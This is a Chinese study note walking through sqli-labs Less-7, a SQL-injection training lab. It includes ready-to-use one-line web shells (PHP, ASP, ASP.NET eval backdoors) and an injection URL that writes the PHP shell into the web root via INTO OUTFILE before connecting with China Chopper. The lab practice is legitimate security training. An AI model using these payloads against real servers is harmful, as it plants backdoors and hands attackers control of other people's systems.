知识补充

1.into outfile 写文件
例:select ‘mysql is very good’ into outfile ‘text.txt’;
例:select ‘mysql is very good’ into outfile ‘D:\wamp\www\sql\Less-7\text.txt’;

2.load_file() 读取本地文件
例:select load_file(‘D:\wamp\www\sql\Less-7\text.txt’);

注意事项: \ 一些特别的字符要注意使用转义字符 如:\t 、\n 等。

3.一句话木马(其中caidao是密码)
php版本:<?php @eval($_POST["caidao"]);?> 其中caidao是密码
ASP版本: <%eval request(“caidao”)%>
ASP.NET版本:<%@ Page Language=“Jscript”%><%eval(Request.Item[“caidao”],“unsafe”);%>

——————————分割线——————————————

Sqli-labs-Less-7

查看是否存在注入
当我们使用?id=1时也没有报错,并显示You are in… Use outfile…提示我们使用outfile函数来进行注入
Sqli-labs-Less-7(笔记)
当我们使用?id=1’和?id=1’)报错,不过当我们注释掉时继续报错,说明还是不对
Sqli-labs-Less-7(笔记)
当我们使用?id=1’))报错,不过当我们注释掉时返回正确,说明此处存在注入点
Sqli-labs-Less-7(笔记)
查看有多少列
http://www.web.com/sql/Less-7/?id=1’)) order by 3–+ 返回正确,说明有三列
Sqli-labs-Less-7(笔记)

使用一句话木马
因为我们注入的最终目的是拿到最大权限,在这里使用into outfile 将一句话木马写入并使用中国菜刀连接。
http://www.web.com/sql/Less-7/?id=1’)) union select 1,2,’<?php @eval($_POST["caidao"]);?>’ into outfile ‘D:\wamp\www\sql\Less-7\text1.php’–+
Sqli-labs-Less-7(笔记)
返回错误,但是我们在目录中看文件已经被写入到目录中
Sqli-labs-Less-7(笔记)
使用中国菜刀连接
Sqli-labs-Less-7(笔记)
添加成功
Sqli-labs-Less-7(笔记)
双击拿到权限
Sqli-labs-Less-7(笔记)
攻击完成。

在此我测试能否使用布尔盲注,测试成功,不过无法使用burp进行**,需要自己进行盲猜。效率较慢。
注意:在Sqli-labs-Less-5中是?id=1’
在Sqli-labs-Less-7中是?id=1’))
布尔盲注连接Sqli-labs-Less-5

相关文章: